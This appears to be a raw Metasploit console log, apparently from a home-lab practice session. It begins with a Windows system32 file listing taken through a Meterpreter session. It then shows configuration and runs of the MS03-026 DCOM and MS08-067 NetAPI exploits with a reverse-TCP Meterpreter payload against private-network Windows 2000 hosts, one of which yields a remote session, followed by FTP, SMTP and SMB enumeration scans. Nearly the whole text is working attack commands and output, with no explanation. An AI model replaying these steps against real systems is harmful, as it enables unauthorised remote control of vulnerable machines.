  2189. 100666/rw-rw-rw- 977680 fil 2002-12-31 07:00:00 -0500 vfpodbc.dll
  2190. 100666/rw-rw-rw- 83888 fil 2002-12-31 07:00:00 -0500 vga.dll
  2191. 100666/rw-rw-rw- 2176 fil 2002-12-31 07:00:00 -0500 vga.drv
  2192. 100666/rw-rw-rw- 51344 fil 2002-12-31 07:00:00 -0500 vga256.dll
  2193. 100666/rw-rw-rw- 18128 fil 2002-12-31 07:00:00 -0500 vga64k.dll
  2194. 100666/rw-rw-rw- 5392 fil 2002-12-31 07:00:00 -0500 vjoy.dll
  2195. 100666/rw-rw-rw- 20240 fil 2002-12-31 07:00:00 -0500 vwipxspx.dll
  2196. 100777/rwxrwxrwx 1129 fil 2002-12-31 07:00:00 -0500 vwipxspx.exe
  2197. 100666/rw-rw-rw- 51472 fil 2002-12-31 07:00:00 -0500 w32time.dll
  2198. 100777/rwxrwxrwx 57104 fil 2002-12-31 07:00:00 -0500 w32tm.exe
  2199. 100666/rw-rw-rw- 12560 fil 2002-12-31 07:00:00 -0500 w32topl.dll
  2200. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 w3ctrs.dll
  2201. 100666/rw-rw-rw- 5379 fil 1999-05-19 18:07:02 -0400 w3ctrs.h
  2202. 100666/rw-rw-rw- 38523 fil 2002-12-31 07:00:00 -0500 w3ctrs.ini
  2203. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 w3svapi.dll
  2204. 100666/rw-rw-rw- 7440 fil 2002-12-31 07:00:00 -0500 wamregps.dll
  2205. 100666/rw-rw-rw- 155920 fil 2002-12-31 07:00:00 -0500 wavemsp.dll
  2206. 100666/rw-rw-rw- 65489 fil 2002-12-31 07:00:00 -0500 wbcache.deu
  2207. 100666/rw-rw-rw- 65489 fil 2002-12-31 07:00:00 -0500 wbcache.enu
  2208. 100666/rw-rw-rw- 65489 fil 2002-12-31 07:00:00 -0500 wbcache.esn
  2209. 100666/rw-rw-rw- 65489 fil 2002-12-31 07:00:00 -0500 wbcache.fra
  2210. 100666/rw-rw-rw- 65489 fil 2002-12-31 07:00:00 -0500 wbcache.ita
  2211. 100666/rw-rw-rw- 65489 fil 2002-12-31 07:00:00 -0500 wbcache.nld
  2212. 100666/rw-rw-rw- 65489 fil 2002-12-31 07:00:00 -0500 wbcache.sve
  2213. 100666/rw-rw-rw- 1309184 fil 2002-12-31 07:00:00 -0500 wbdbase.deu
  2214. 100666/rw-rw-rw- 957440 fil 2002-12-31 07:00:00 -0500 wbdbase.enu
  2215. 100666/rw-rw-rw- 750080 fil 2002-12-31 07:00:00 -0500 wbdbase.esn
  2216. 100666/rw-rw-rw- 786944 fil 2002-12-31 07:00:00 -0500 wbdbase.fra
  2217. 100666/rw-rw-rw- 867840 fil 2002-12-31 07:00:00 -0500 wbdbase.ita
  2218. 100666/rw-rw-rw- 1095680 fil 2002-12-31 07:00:00 -0500 wbdbase.nld
  2219. 100666/rw-rw-rw- 937984 fil 2002-12-31 07:00:00 -0500 wbdbase.sve
  2220. 40777/rwxrwxrwx 0 dir 2017-05-25 06:14:45 -0400 wbem
  2221. 100666/rw-rw-rw- 4096 fil 2002-12-31 07:00:00 -0500 wdl.trm
  2222. 100666/rw-rw-rw- 257808 fil 2002-12-31 07:00:00 -0500 webcheck.dll
  2223. 100666/rw-rw-rw- 1337344 fil 2002-12-31 07:00:00 -0500 webfldrs.msi
  2224. 100666/rw-rw-rw- 42768 fil 2002-12-31 07:00:00 -0500 webhits.dll
  2225. 100666/rw-rw-rw- 1115408 fil 2002-12-31 07:00:00 -0500 webvw.dll
  2226. 100777/rwxrwxrwx 60688 fil 2002-12-31 07:00:00 -0500 wextract.exe
  2227. 100666/rw-rw-rw- 13792 fil 2002-12-31 07:00:00 -0500 wfwnet.drv
  2228. 100666/rw-rw-rw- 9216 fil 2002-12-31 07:00:00 -0500 wifeman.dll
  2229. 100777/rwxrwxrwx 24848 fil 2002-12-31 07:00:00 -0500 win.com
  2230. 100666/rw-rw-rw- 1717936 fil 2002-12-31 07:00:00 -0500 win32k.sys
  2231. 100666/rw-rw-rw- 97040 fil 2002-12-31 07:00:00 -0500 win32spl.dll
  2232. 100666/rw-rw-rw- 13312 fil 2002-12-31 07:00:00 -0500 win87em.dll
  2233. 100777/rwxrwxrwx 66832 fil 2002-12-31 07:00:00 -0500 winchat.exe
  2234. 100666/rw-rw-rw- 59152 fil 2002-12-31 07:00:00 -0500 winfax.dll
  2235. 100666/rw-rw-rw- 32674 fil 2002-12-31 07:00:00 -0500 winhelp.hlp
  2236. 100777/rwxrwxrwx 8976 fil 2002-12-31 07:00:00 -0500 winhlp32.exe
  2237. 100666/rw-rw-rw- 310784 fil 2002-12-31 07:00:00 -0500 winhttp.dll
  2238. 100666/rw-rw-rw- 466704 fil 2002-12-31 07:00:00 -0500 wininet.dll
  2239. 100777/rwxrwxrwx 181008 fil 2002-12-31 07:00:00 -0500 winlogon.exe
  2240. 100777/rwxrwxrwx 96528 fil 2002-12-31 07:00:00 -0500 winmine.exe
  2241. 100666/rw-rw-rw- 189200 fil 2002-12-31 07:00:00 -0500 winmm.dll
  2242. 100777/rwxrwxrwx 11536 fil 2002-12-31 07:00:00 -0500 winmsd.exe
  2243. 100666/rw-rw-rw- 5120 fil 2002-12-31 07:00:00 -0500 winnls.dll
  2244. 100666/rw-rw-rw- 2080 fil 2002-12-31 07:00:00 -0500 winoldap.mod
  2245. 100666/rw-rw-rw- 19216 fil 2002-12-31 07:00:00 -0500 winrnr.dll
  2246. 40777/rwxrwxrwx 0 dir 2018-11-21 02:42:06 -0500 wins
  2247. 100777/rwxrwxrwx 145168 fil 2002-12-31 07:00:00 -0500 wins.exe
  2248. 100666/rw-rw-rw- 79120 fil 2002-12-31 07:00:00 -0500 winscard.dll
  2249. 100666/rw-rw-rw- 6928 fil 2002-12-31 07:00:00 -0500 winsctrs.dll
  2250. 100666/rw-rw-rw- 87824 fil 2002-12-31 07:00:00 -0500 winsevnt.dll
  2251. 100666/rw-rw-rw- 53248 fil 2002-12-31 07:00:00 -0500 winsmgmt.msc
  2252. 100666/rw-rw-rw- 23312 fil 2002-12-31 07:00:00 -0500 winsmib.dll
  2253. 100666/rw-rw-rw- 239376 fil 2002-12-31 07:00:00 -0500 winsmon.dll
  2254. 100666/rw-rw-rw- 2864 fil 2002-12-31 07:00:00 -0500 winsock.dll
  2255. 100666/rw-rw-rw- 113936 fil 2002-12-31 07:00:00 -0500 winspool.drv
  2256. 100777/rwxrwxrwx 2112 fil 2002-12-31 07:00:00 -0500 winspool.exe
  2257. 100666/rw-rw-rw- 13584 fil 2002-12-31 07:00:00 -0500 winsrpc.dll
  2258. 100666/rw-rw-rw- 252688 fil 2002-12-31 07:00:00 -0500 winsrv.dll
  2259. 100666/rw-rw-rw- 633104 fil 2002-12-31 07:00:00 -0500 winssnap.dll
  2260. 100666/rw-rw-rw- 39184 fil 2002-12-31 07:00:00 -0500 winsta.dll
  2261. 100666/rw-rw-rw- 19728 fil 2002-12-31 07:00:00 -0500 winstrm.dll
  2262. 100666/rw-rw-rw- 166160 fil 2002-12-31 07:00:00 -0500 wintrust.dll
  2263. 100777/rwxrwxrwx 4368 fil 2002-12-31 07:00:00 -0500 winver.exe
  2264. 100777/rwxrwxrwx 27408 fil 2002-12-31 07:00:00 -0500 wizmgr.exe
  2265. 100666/rw-rw-rw- 98064 fil 2002-12-31 07:00:00 -0500 wkssvc.dll
  2266. 100777/rwxrwxrwx 30992 fil 2002-12-31 07:00:00 -0500 wlbs.exe
  2267. 100666/rw-rw-rw- 26896 fil 2002-12-31 07:00:00 -0500 wlbsctrl.dll
  2268. 100666/rw-rw-rw- 162064 fil 2002-12-31 07:00:00 -0500 wldap32.dll
  2269. 100666/rw-rw-rw- 57616 fil 2002-12-31 07:00:00 -0500 wlnotify.dll
  2270. 100666/rw-rw-rw- 6416 fil 2002-12-31 07:00:00 -0500 wmi.dll
  2271. 100666/rw-rw-rw- 74512 fil 2002-12-31 07:00:00 -0500 wmicore.dll
  2272. 100666/rw-rw-rw- 63488 fil 2002-12-31 07:00:00 -0500 wmimgmt.msc
  2273. 100666/rw-rw-rw- 240912 fil 2002-12-31 07:00:00 -0500 wow32.dll
  2274. 100777/rwxrwxrwx 2768 fil 2002-12-31 07:00:00 -0500 wowdeb.exe
  2275. 100777/rwxrwxrwx 10368 fil 2002-12-31 07:00:00 -0500 wowexec.exe
  2276. 100666/rw-rw-rw- 3312 fil 2002-12-31 07:00:00 -0500 wowfax.dll
  2277. 100666/rw-rw-rw- 14608 fil 2002-12-31 07:00:00 -0500 wowfaxui.dll
  2278. 100777/rwxrwxrwx 29968 fil 2002-12-31 07:00:00 -0500 wpnpinst.exe
  2279. 100777/rwxrwxrwx 6416 fil 2002-12-31 07:00:00 -0500 write.exe
  2280. 100666/rw-rw-rw- 69904 fil 2002-12-31 07:00:00 -0500 ws2_32.dll
  2281. 100666/rw-rw-rw- 18192 fil 2002-12-31 07:00:00 -0500 ws2help.dll
  2282. 100777/rwxrwxrwx 90162 fil 2002-12-31 07:00:00 -0500 wscript.exe
  2283. 100666/rw-rw-rw- 542480 fil 2002-12-31 07:00:00 -0500 wsecedit.dll
  2284. 100666/rw-rw-rw- 10000 fil 2002-12-31 07:00:00 -0500 wshatm.dll
  2285. 100666/rw-rw-rw- 45105 fil 2002-12-31 07:00:00 -0500 wshext.dll
  2286. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 wshirda.dll
  2287. 100666/rw-rw-rw- 12560 fil 2002-12-31 07:00:00 -0500 wshisn.dll
  2288. 100666/rw-rw-rw- 7952 fil 2002-12-31 07:00:00 -0500 wshnetbs.dll
  2289. 100666/rw-rw-rw- 73776 fil 2002-12-31 07:00:00 -0500 wshom.ocx
  2290. 100666/rw-rw-rw- 17680 fil 2002-12-31 07:00:00 -0500 wshtcpip.dll
  2291. 100666/rw-rw-rw- 39696 fil 2002-12-31 07:00:00 -0500 wsnmp32.dll
  2292. 100666/rw-rw-rw- 21776 fil 2002-12-31 07:00:00 -0500 wsock32.dll
  2293. 100666/rw-rw-rw- 14608 fil 2002-12-31 07:00:00 -0500 wtsapi32.dll
  2294. 100777/rwxrwxrwx 141312 fil 2002-12-31 07:00:00 -0500 wuauclt.exe
  2295. 100666/rw-rw-rw- 54272 fil 2002-12-31 07:00:00 -0500 wuaucpl.cpl
  2296. 100666/rw-rw-rw- 192512 fil 2002-12-31 07:00:00 -0500 wuaueng.dll
  2297. 100666/rw-rw-rw- 9216 fil 2002-12-31 07:00:00 -0500 wuauserv.dll
  2298. 100666/rw-rw-rw- 28400 fil 2002-12-31 07:00:00 -0500 wupdinfo.dll
  2299. 100777/rwxrwxrwx 47376 fil 2002-12-31 07:00:00 -0500 wupdmgr.exe
  2300. 100666/rw-rw-rw- 52496 fil 2002-12-31 07:00:00 -0500 wzcdlg.dll
  2301. 100666/rw-rw-rw- 29968 fil 2002-12-31 07:00:00 -0500 wzcsapi.dll
  2302. 100777/rwxrwxrwx 34576 fil 2002-12-31 07:00:00 -0500 wzcsetup.exe
  2303. 100666/rw-rw-rw- 195856 fil 2002-12-31 07:00:00 -0500 wzcsvc.dll
  2304. 100666/rw-rw-rw- 92432 fil 2002-12-31 07:00:00 -0500 xactsrv.dll
  2305. 100777/rwxrwxrwx 28432 fil 2002-12-31 07:00:00 -0500 xcopy.exe
  2306. 100666/rw-rw-rw- 172664 fil 2002-12-31 07:00:00 -0500 xenroll.dll
  2307. 100666/rw-rw-rw- 641808 fil 2002-12-31 07:00:00 -0500 xiffr3_0.dll
  2308. 100666/rw-rw-rw- 17680 fil 2002-12-31 07:00:00 -0500 xolehlp.dll
  2309.  
  2310. meterpreter > show targets
  2311. [-] Unknown command: show.
  2312. meterpreter > quit
  2313. [*] Shutting down Meterpreter...
  2314.  
  2315. [*] 192.168.1.25 - Meterpreter session 1 closed. Reason: User exit
  2316. msf exploit(windows/dcerpc/ms03_026_dcom) > show targets
  2317.  
  2318. Exploit targets:
  2319.  
  2320. Id Name
  2321. -- ----
  2322. 0 Windows NT SP3-6a/2000/XP/2003 Universal
  2323.  
  2324.  
  2325. msf exploit(windows/dcerpc/ms03_026_dcom) > set rhost 192.168.1.108
  2326. rhost => 192.168.1.108
  2327. msf exploit(windows/dcerpc/ms03_026_dcom) > show targets
  2328.  
  2329. Exploit targets:
  2330.  
  2331. Id Name
  2332. -- ----
  2333. 0 Windows NT SP3-6a/2000/XP/2003 Universal
  2334.  
  2335.  
  2336. msf exploit(windows/dcerpc/ms03_026_dcom) > show options
  2337.  
  2338. Module options (exploit/windows/dcerpc/ms03_026_dcom):
  2339.  
  2340. Name Current Setting Required Description
  2341. ---- --------------- -------- -----------
  2342. RHOST 192.168.1.108 yes The target address
  2343. RPORT 135 yes The target port (TCP)
  2344.  
  2345.  
  2346. Payload options (windows/meterpreter/reverse_tcp):
  2347.  
  2348. Name Current Setting Required Description
  2349. ---- --------------- -------- -----------
  2350. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
  2351. LHOST 192.168.1.10 yes The listen address (an interface may be specified)
  2352. LPORT 4444 yes The listen port
  2353.  
  2354.  
  2355. Exploit target:
  2356.  
  2357. Id Name
  2358. -- ----
  2359. 0 Windows NT SP3-6a/2000/XP/2003 Universal
  2360.  
  2361.  
  2362. msf exploit(windows/dcerpc/ms03_026_dcom) > set lhost 192.168.1.10
  2363. lhost => 192.168.1.10
  2364. msf exploit(windows/dcerpc/ms03_026_dcom) > options
  2365.  
  2366. Module options (exploit/windows/dcerpc/ms03_026_dcom):
  2367.  
  2368. Name Current Setting Required Description
  2369. ---- --------------- -------- -----------
  2370. RHOST 192.168.1.108 yes The target address
  2371. RPORT 135 yes The target port (TCP)
  2372.  
  2373.  
  2374. Payload options (windows/meterpreter/reverse_tcp):
  2375.  
  2376. Name Current Setting Required Description
  2377. ---- --------------- -------- -----------
  2378. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
  2379. LHOST 192.168.1.10 yes The listen address (an interface may be specified)
  2380. LPORT 4444 yes The listen port
  2381.  
  2382.  
  2383. Exploit target:
  2384.  
  2385. Id Name
  2386. -- ----
  2387. 0 Windows NT SP3-6a/2000/XP/2003 Universal
  2388.  
  2389.  
  2390. msf exploit(windows/dcerpc/ms03_026_dcom) > exploit
  2391.  
  2392. [*] Started reverse TCP handler on 192.168.1.10:4444
  2393. [-] 192.168.1.108:135 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.108:135).
  2394. [*] Exploit completed, but no session was created.
  2395. msf exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
  2396. payload => windows/meterpreter/reverse_tcp
  2397. msf exploit(windows/dcerpc/ms03_026_dcom) > set rhost 192.168.1.25
  2398. rhost => 192.168.1.25
  2399. msf exploit(windows/dcerpc/ms03_026_dcom) > exploit
  2400.  
  2401. [*] Started reverse TCP handler on 192.168.1.10:4444
  2402. [*] 192.168.1.25:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
  2403. [*] 192.168.1.25:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.25[135] ...
  2404. [*] 192.168.1.25:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.25[135] ...
  2405. [*] 192.168.1.25:135 - Sending exploit ...
  2406. [*] Sending stage (179779 bytes) to 192.168.1.25
  2407. [*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.25:1882) at 2018-11-26 02:14:04 -0500
  2408.  
  2409. meterpreter > screenshot
  2410.  
  2411. [*] 192.168.1.25 - Meterpreter session 2 closed. Reason: Died
  2412. [-] Error running command screenshot: Rex::TimeoutError Operation timed out.
  2413. msf exploit(windows/dcerpc/ms03_026_dcom) > set lport 21
  2414. lport => 21
  2415. msf exploit(windows/dcerpc/ms03_026_dcom) > exploit
  2416.  
  2417. [-] Handler failed to bind to 192.168.1.10:21:- -
  2418. [-] Handler failed to bind to 0.0.0.0:21:- -
  2419. [-] 192.168.1.25:135 - Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:21
  2420. [*] Exploit completed, but no session was created.
  2421. msf exploit(windows/dcerpc/ms03_026_dcom) > set lport 135
  2422. lport => 135
  2423. msf exploit(windows/dcerpc/ms03_026_dcom) > exploit
  2424.  
  2425. [-] Handler failed to bind to 192.168.1.10:135:- -
  2426. [-] Handler failed to bind to 0.0.0.0:135:- -
  2427. [-] 192.168.1.25:135 - Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:135
  2428. [*] Exploit completed, but no session was created.
  2429. msf exploit(windows/dcerpc/ms03_026_dcom) > quit
  2430. ssmith@kali:~$ /usr/share/metasploit-framework/msfconsole
  2431.  
  2432.  
  2433. .:okOOOkdc' 'cdkOOOko:.
  2434. .xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
  2435. :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
  2436. 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  2437. oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
  2438. dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
  2439. lOOOOOOOO. ;d; ,OOOOOOOOl
  2440. .OOOOOOOO. .; ; ,OOOOOOOO.
  2441. cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
  2442. oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
  2443. lOOOOO. .OOOO. :OOOO. ,OOOOOl
  2444. ;OOOO' .OOOO. :OOOO. ;OOOO;
  2445. .dOOo .OOOOocccxOOOO. xOOd.
  2446. ,kOl .OOOOOOOOOOOOO. .dOk,
  2447. :kk;.OOOOOOOOOOOOO.cOk:
  2448. ;kOOOOOOOOOOOOOOOk:
  2449. ,xOOOOOOOOOOOx,
  2450. .lOOOOOOOl.
  2451. ,dOd,
  2452. .
  2453.  
  2454. =[ metasploit v4.17.3-dev ]
  2455. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
  2456. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
  2457. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2458.  
  2459. msf > msf exploit(windows/dcerpc/ms03_026_dcom) > show targets
  2460. [-] Unknown command: msf.
  2461. msf > use exploit(windows/dcerpc/ms03_026_dcom) > show targets
  2462. [-] Failed to load module: exploit(windows/dcerpc/ms03_026_dcom)
  2463. msf > use exploit(windows/dcerpc/ms03_026_dcom)
  2464. [-] Failed to load module: exploit(windows/dcerpc/ms03_026_dcom)
  2465. msf > use exploit/windows/dcerpc/ms03_026_dcom
  2466. msf exploit(windows/dcerpc/ms03_026_dcom) > show arget
  2467. [-] Invalid parameter "arget", use "show -h" for more information
  2468. msf exploit(windows/dcerpc/ms03_026_dcom) > show target
  2469. [-] Invalid parameter "target", use "show -h" for more information
  2470. msf exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
  2471. payload => windows/meterpreter/reverse_tcp
  2472. msf exploit(windows/dcerpc/ms03_026_dcom) > show options
  2473.  
  2474. Module options (exploit/windows/dcerpc/ms03_026_dcom):
  2475.  
  2476. Name Current Setting Required Description
  2477. ---- --------------- -------- -----------
  2478. RHOST yes The target address
  2479. RPORT 135 yes The target port (TCP)
  2480.  
  2481.  
  2482. Payload options (windows/meterpreter/reverse_tcp):
  2483.  
  2484. Name Current Setting Required Description
  2485. ---- --------------- -------- -----------
  2486. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
  2487. LHOST yes The listen address (an interface may be specified)
  2488. LPORT 4444 yes The listen port
  2489.  
  2490.  
  2491. Exploit target:
  2492.  
  2493. Id Name
  2494. -- ----
  2495. 0 Windows NT SP3-6a/2000/XP/2003 Universal
  2496.  
  2497.  
  2498. msf exploit(windows/dcerpc/ms03_026_dcom) > set target 0
  2499. target => 0
  2500. msf exploit(windows/dcerpc/ms03_026_dcom) > set lhost 192.168.1.10
  2501. lhost => 192.168.1.10
  2502. msf exploit(windows/dcerpc/ms03_026_dcom) > set rhost 192.168.1.25
  2503. rhost => 192.168.1.25
  2504. msf exploit(windows/dcerpc/ms03_026_dcom) > set rport 4444
  2505. rport => 4444
  2506. msf exploit(windows/dcerpc/ms03_026_dcom) > exploit
  2507.  
  2508. [*] Started reverse TCP handler on 192.168.1.10:4444
  2509. [-] 192.168.1.25:4444 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.25:4444).
  2510. [*] Exploit completed, but no session was created.
  2511. msf exploit(windows/dcerpc/ms03_026_dcom) > set rport 21
  2512. rport => 21
  2513. msf exploit(windows/dcerpc/ms03_026_dcom) > exploit
  2514.  
  2515. [*] Started reverse TCP handler on 192.168.1.10:4444
  2516. [*] 192.168.1.25:21 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
  2517. [*] 192.168.1.25:21 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.25[21] ...
  2518. [-] 192.168.1.25:21 - Exploit failed: Rex::Proto::DCERPC::Exceptions::BindError Failed to bind. Could not bind to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.25[21]
  2519. [*] Exploit completed, but no session was created.
  2520. msf exploit(windows/dcerpc/ms03_026_dcom) > use exploit/windows/smb/ms08_067_netapi
  2521. msf exploit(windows/smb/ms08_067_netapi) > exploit
  2522.  
  2523. [-] Exploit failed: The following options failed to validate: RHOST.
  2524. [*] Exploit completed, but no session was created.
  2525. msf exploit(windows/smb/ms08_067_netapi) > show options
  2526.  
  2527. Module options (exploit/windows/smb/ms08_067_netapi):
  2528.  
  2529. Name Current Setting Required Description
  2530. ---- --------------- -------- -----------
  2531. RHOST yes The target address
  2532. RPORT 445 yes The SMB service port (TCP)
  2533. SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
  2534.  
  2535.  
  2536. Payload options (windows/meterpreter/reverse_tcp):
  2537.  
  2538. Name Current Setting Required Description
  2539. ---- --------------- -------- -----------
  2540. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
  2541. LHOST 192.168.1.10 yes The listen address (an interface may be specified)
  2542. LPORT 4444 yes The listen port
  2543.  
  2544.  
  2545. Exploit target:
  2546.  
  2547. Id Name
  2548. -- ----
  2549. 0 Automatic Targeting
  2550.  
  2551.  
  2552. msf exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.25
  2553. rhost => 192.168.1.25
  2554. msf exploit(windows/smb/ms08_067_netapi) > show options
  2555.  
  2556. Module options (exploit/windows/smb/ms08_067_netapi):
  2557.  
  2558. Name Current Setting Required Description
  2559. ---- --------------- -------- -----------
  2560. RHOST 192.168.1.25 yes The target address
  2561. RPORT 445 yes The SMB service port (TCP)
  2562. SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
  2563.  
  2564.  
  2565. Payload options (windows/meterpreter/reverse_tcp):
  2566.  
  2567. Name Current Setting Required Description
  2568. ---- --------------- -------- -----------
  2569. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
  2570. LHOST 192.168.1.10 yes The listen address (an interface may be specified)
  2571. LPORT 4444 yes The listen port
  2572.  
  2573.  
  2574. Exploit target:
  2575.  
  2576. Id Name
  2577. -- ----
  2578. 0 Automatic Targeting
  2579.  
  2580.  
  2581. msf exploit(windows/smb/ms08_067_netapi) > exploit
  2582.  
  2583. [*] Started reverse TCP handler on 192.168.1.10:4444
  2584. [*] 192.168.1.25:445 - Automatically detecting the target...
  2585. [*] 192.168.1.25:445 - Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
  2586. [*] 192.168.1.25:445 - Selected Target: Windows 2000 Universal
  2587. [*] 192.168.1.25:445 - Attempting to trigger the vulnerability...
  2588. [*] Exploit completed, but no session was created.
  2589. msf exploit(windows/smb/ms08_067_netapi) > screenshot
  2590. [-] Unknown command: screenshot.
  2591. msf exploit(windows/smb/ms08_067_netapi) > show target
  2592. [-] Invalid parameter "target", use "show -h" for more information
  2593. msf exploit(windows/smb/ms08_067_netapi) > show options
  2594.  
  2595. Module options (exploit/windows/smb/ms08_067_netapi):
  2596.  
  2597. Name Current Setting Required Description
  2598. ---- --------------- -------- -----------
  2599. RHOST 192.168.1.25 yes The target address
  2600. RPORT 445 yes The SMB service port (TCP)
  2601. SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
  2602.  
  2603.  
  2604. Payload options (windows/meterpreter/reverse_tcp):
  2605.  
  2606. Name Current Setting Required Description
  2607. ---- --------------- -------- -----------
  2608. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
  2609. LHOST 192.168.1.10 yes The listen address (an interface may be specified)
  2610. LPORT 4444 yes The listen port
  2611.  
  2612.  
  2613. Exploit target:
  2614.  
  2615. Id Name
  2616. -- ----
  2617. 0 Automatic Targeting
  2618.  
  2619.  
  2620. msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
  2621. payload => windows/meterpreter/reverse_tcp
  2622. msf exploit(windows/smb/ms08_067_netapi) > show options
  2623.  
  2624. Module options (exploit/windows/smb/ms08_067_netapi):
  2625.  
  2626. Name Current Setting Required Description
  2627. ---- --------------- -------- -----------
  2628. RHOST 192.168.1.25 yes The target address
  2629. RPORT 445 yes The SMB service port (TCP)
  2630. SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
  2631.  
  2632.  
  2633. Payload options (windows/meterpreter/reverse_tcp):
  2634.  
  2635. Name Current Setting Required Description
  2636. ---- --------------- -------- -----------
  2637. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
  2638. LHOST 192.168.1.10 yes The listen address (an interface may be specified)
  2639. LPORT 4444 yes The listen port
  2640.  
  2641.  
  2642. Exploit target:
  2643.  
  2644. Id Name
  2645. -- ----
  2646. 0 Automatic Targeting
  2647.  
  2648.  
  2649. msf exploit(windows/smb/ms08_067_netapi) > set rport 21
  2650. rport => 21
  2651. msf exploit(windows/smb/ms08_067_netapi) > exploit
  2652.  
  2653. [*] Started reverse TCP handler on 192.168.1.10:4444
  2654. [-] 192.168.1.25:21 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The SMB response packet was invalid
  2655. [*] Exploit completed, but no session was created.
  2656. msf exploit(windows/smb/ms08_067_netapi) > use auxillary/scanner/ftp/anonymous
  2657. ^C[-] Error while running command use:
  2658. msf exploit(windows/smb/ms08_067_netapi) > use exploit auxillary/scanner/ftp/anonymous
  2659. [-] Failed to load module: exploit
  2660. msf exploit(windows/smb/ms08_067_netapi) > show options
  2661.  
  2662. Module options (exploit/windows/smb/ms08_067_netapi):
  2663.  
  2664. Name Current Setting Required Description
  2665. ---- --------------- -------- -----------
  2666. RHOST 192.168.1.25 yes The target address
  2667. RPORT 21 yes The SMB service port (TCP)
  2668. SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
  2669.  
  2670.  
  2671. Payload options (windows/meterpreter/reverse_tcp):
  2672.  
  2673. Name Current Setting Required Description
  2674. ---- --------------- -------- -----------
  2675. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
  2676. LHOST 192.168.1.10 yes The listen address (an interface may be specified)
  2677. LPORT 4444 yes The listen port
  2678.  
  2679.  
  2680. Exploit target:
  2681.  
  2682. Id Name
  2683. -- ----
  2684. 0 Automatic Targeting
  2685.  
  2686.  
  2687. msf exploit(windows/smb/ms08_067_netapi) > use auxiliary/scanner/snmp/snmp_enum
  2688. msf auxiliary(scanner/snmp/snmp_enum) > use auxiliary/scanner/ftp/anonymous
  2689. msf auxiliary(scanner/ftp/anonymous) > show options
  2690.  
  2691. Module options (auxiliary/scanner/ftp/anonymous):
  2692.  
  2693. Name Current Setting Required Description
  2694. ---- --------------- -------- -----------
  2695. FTPPASS mozilla@example.com no The password for the specified username
  2696. FTPUSER anonymous no The username to authenticate as
  2697. RHOSTS yes The target address range or CIDR identifier
  2698. RPORT 21 yes The target port (TCP)
  2699. THREADS 1 yes The number of concurrent threads
  2700.  
  2701. msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.25
  2702. RHOSTS => 192.168.1.25
  2703. msf auxiliary(scanner/ftp/anonymous) > run
  2704.  
  2705. [+] 192.168.1.25:21 - 192.168.1.25:21 - Anonymous READ (220 server-1 Microsoft FTP Service (Version 5.0).)
  2706. [*] Scanned 1 of 1 hosts (100% complete)
  2707. [*] Auxiliary module execution completed
  2708. msf auxiliary(scanner/ftp/anonymous) > use auxillary/scanner/smtp/smtp_enum
  2709. ^C[-] Error while running command use:
  2710. msf auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/smtp/smtp_enum
  2711. msf auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 192.168.1.25
  2712. RHOSTS => 192.168.1.25
  2713. msf auxiliary(scanner/smtp/smtp_enum) > run
  2714.  
  2715. [*] 192.168.1.25:25 - 192.168.1.25:25 Skipping microsoft (220 server-1 Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Mon, 26 Nov 2018 02:07:17 -0800 )
  2716. [*] Scanned 1 of 1 hosts (100% complete)
  2717. [*] Auxiliary module execution completed
  2718. msf auxiliary(scanner/smtp/smtp_enum) > use auxiliary/scanner/smb/smb_enumusers
  2719. msf auxiliary(scanner/smb/smb_enumusers) > show options
  2720.  
  2721. Module options (auxiliary/scanner/smb/smb_enumusers):
